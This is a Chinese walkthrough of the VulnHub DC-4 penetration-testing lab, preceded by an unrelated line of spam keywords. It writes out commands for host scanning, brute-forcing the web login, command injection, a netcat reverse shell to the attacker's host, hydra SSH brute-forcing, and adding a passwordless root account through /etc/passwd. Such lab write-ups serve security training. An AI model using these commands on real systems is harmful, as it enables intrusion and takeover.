韩国男女直接做的视频网站,做一个微信小程序需要多少钱,网站做支付,滴滴出行网站建设目录 0x00 准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用1. 爆破登录2. 命令执行3. 反弹shell4. hydra爆破ssh5. 提权 0x04 总结 0x00 准备
下载链接#xff1a;https://download.vulnhub.com/dc/DC-4.zip
介绍#xff1a; DC-4 is another purposely built … 目录 0x00 准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用1. 爆破登录2. 命令执行3. 反弹shell4. hydra爆破ssh5. 提权 0x04 总结 0x00 准备
下载链接https://download.vulnhub.com/dc/DC-4.zip
介绍 DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can always tweet me at DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
重点只有一个flag。 0x01 主机信息收集 kali本机IPifconfig 网卡eth0地址192.168.22.28
发现目标主机IPnetdiscover -i eth0 地址192.168.22.29。
探测目标主机开放端口nmap -sS -sV -A -n 192.168.22.29开放了22端口和80端口其中80端口使用的nginx1.15.10。 0x02 站点信息收集 访问一下80端口 看一下网站的目录结构dirsearch -u 192.168.22.29 -e *
只有一个index.php有其他的目录也全部重定向到这个页面中了。 index.php就只有一个登录框其他有用的信息几乎没有。可以考虑爆破。 0x03 漏洞查找与利用
1. 爆破登录 输入username和password以后抓包传输的明文的用户名和密码
将抓到的包发送到Intruder攻击模块Attack Type攻击模式先选择Sniper狙击手模式盲猜username是admin所以先只对password进行爆破
payload set是对哪个字段进行爆破前一步只设置了password一个字段。payload type选择Simple list简单字典即可。导入top1000的弱口令点击start attack开始爆破
对爆破的结果按照length进行排序回显最长的这个是密码。
登录进来以后看到下图左边的界面。点击command到右边的界面。可以运行一些命令点击run试一下会回显运行的结果。考虑抓包进行命令执行。注意有个command.php文件。
2. 命令执行 选择一个命令run一下抓包。是通过radio这个参数提交run的命令的并且命令的空格用代替。
修改radio的值为cat command.php看一下这个文件的内容。用的shell_exec()直接考虑反弹shell。
3. 反弹shell kali中安装netcatsudo apt install netcat-traditional kali中监听一个没有被占用的端口nc -lvp 6666
在burpsuite中执行nc 192.168.22.28 6666 -e /bin/bash kali的ip 将空格替换成nc192.168.22.286666±e/bin/bash
forward上面的数据包以后看到已经监听6666端口成功。
执行一下命令ls可以看到成功。
执行命令python -c import pty;pty.spawn(/bin/bash) 通过python的pty.spawn获得交互式shell。
4. hydra爆破ssh 去home目录下找到jim用户进入用户/home/jim/backups目录下面有一个old-passwords.bak文件文件内容是一些密码。并且目标机器开启了22端口考虑是jim账户的密码。
把文件内容保存成a.txt。利用hydra对jim用户名进行爆破。 执行命令hydra -l jim -P a.txt 192.168.22.29 ssh
ssh连接目标主机用户名jim密码jibril04。 命令ssh jim192.168.22.29
5. 提权 登录成功后提示有邮件。进入linux的邮件目录cd /var/spool/mail/ 查看jim文件内容可以得到一个Charles用户给的密码。
切换到Charles用户su Charles 查看当前用户的权限sudo -l
考虑teehee提权。teehee命令可以往一个文件中追加内容可以通过这个命令向/etc/passwd中追加一个超级用户用户名为admin没有密码并且有root权限。 执行命令echo admin::0:0:::/bin/bash | sudo teehee -a /etc/passwd 添加用户成功以后切换到adminsu admin 进入root目录可以看到flag.txt。
0x04 总结 主机信息收集
netdiscover探测目标主机ip。nmap探测开放端口和服务。 站点信息收集
dirsearch查看网站目录结构。利用burpsuite的Intruder模块弱口令爆破站点的登录密码。 漏洞利用
命令执行反弹shell。hydra爆破ssh。teehee提权。
